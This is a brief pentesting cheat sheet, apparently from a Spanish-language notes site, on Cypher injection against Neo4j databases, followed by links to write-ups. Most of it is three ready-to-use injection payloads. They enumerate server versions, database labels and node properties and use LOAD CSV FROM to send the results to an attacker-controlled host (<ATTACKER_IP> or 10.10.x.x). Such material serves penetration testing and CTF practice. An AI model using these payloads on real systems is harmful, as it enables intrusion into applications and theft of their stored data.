Cypher Injection

Payloads

Server Versions

' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://<ATTACKER_IP>/?version='+version+'&name='+name+'&edition='+edition as l RETURN 0 as _0 //

Labels (like columns)

' RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://<ATTACKER_IP>/?l='+label as l RETURN 0 as _0 //

Get information from labels (data)

Reemplazar FLAG por la correspondiente

' OR 1=1 WITH 1 as a MATCH (f:FLAG) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.x.x/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //"

References

The most underrated injection of all time — CYPHER INJECTION.InfoSec Write-ups

Cypher injection | Pentesting Notes

Fun with Cypher Injections - HackMDHackMD

Neo4j Pentesting | Exploit Noteshideckies

OnlyForYou HTB | LFR | RCE | Cypher Injection (Neo4j) graph database | pip3 download code executionInfoSec Write-ups

Neo4jection: Secrets, Data, and Cloud Exploits

The Cypher Injection Saga | SideChannel – Tempest

AnteriorLaTeX Injection SiguienteCross-Site Scripting (XSS)

Última actualización hace 4 meses

¿Te fue útil?